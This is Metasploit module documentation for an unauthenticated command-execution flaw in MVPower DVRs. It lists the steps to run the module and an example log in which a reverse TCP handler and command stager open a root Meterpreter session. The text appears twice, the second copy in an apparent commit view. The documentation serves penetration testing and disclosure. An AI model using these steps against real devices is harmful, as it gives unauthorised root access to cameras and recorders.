documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md

## Vulnerable Application

  This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.

  This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).

  The TV-7108HE model is also reportedly affected, but untested.


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
  3. Do: `set rhost [IP]`
  4. Do: `set lhost [IP]`
  5. Do: `run`
  6. You should get a session


## Example Run


  ```
  msf exploit(mvpower_dvr_shell_exec) > run

  [*] Started reverse TCP handler on 10.1.1.197:4444 
  [*] 10.1.1.191:80 - Connecting to target
  [+] 10.1.1.191:80 - Target is vulnerable!
  [*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
  [*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
  [*] Command Stager progress - 100.00% done (117/117 bytes)
  [*] Server stopped.

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 10.1.1.191
  OS           :  (Linux 3.0.8)
  Architecture : armv7l
  Meterpreter  : armle/linux
  meterpreter > 
  ```
Add documentation 2017-02-23 07:44:45 +00:00			`## Vulnerable Application`

			`This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.`

			`This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).`

			`The TV-7108HE model is also reportedly affected, but untested.`


			`## Verification Steps`

			1. Start `msfconsole`
			2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
			3. Do: `set rhost [IP]`
			4. Do: `set lhost [IP]`
			5. Do: `run`
			`6. You should get a session`


			`## Example Run`


			```
			`msf exploit(mvpower_dvr_shell_exec) > run`

			`[*] Started reverse TCP handler on 10.1.1.197:4444`
			`[*] 10.1.1.191:80 - Connecting to target`
			`[+] 10.1.1.191:80 - Target is vulnerable!`
			`[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq`
			`[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq`
			`[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500`
			`[*] Command Stager progress - 100.00% done (117/117 bytes)`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 10.1.1.191`
			`OS : (Linux 3.0.8)`
			`Architecture : armv7l`
			`Meterpreter : armle/linux`
			`meterpreter >`
			```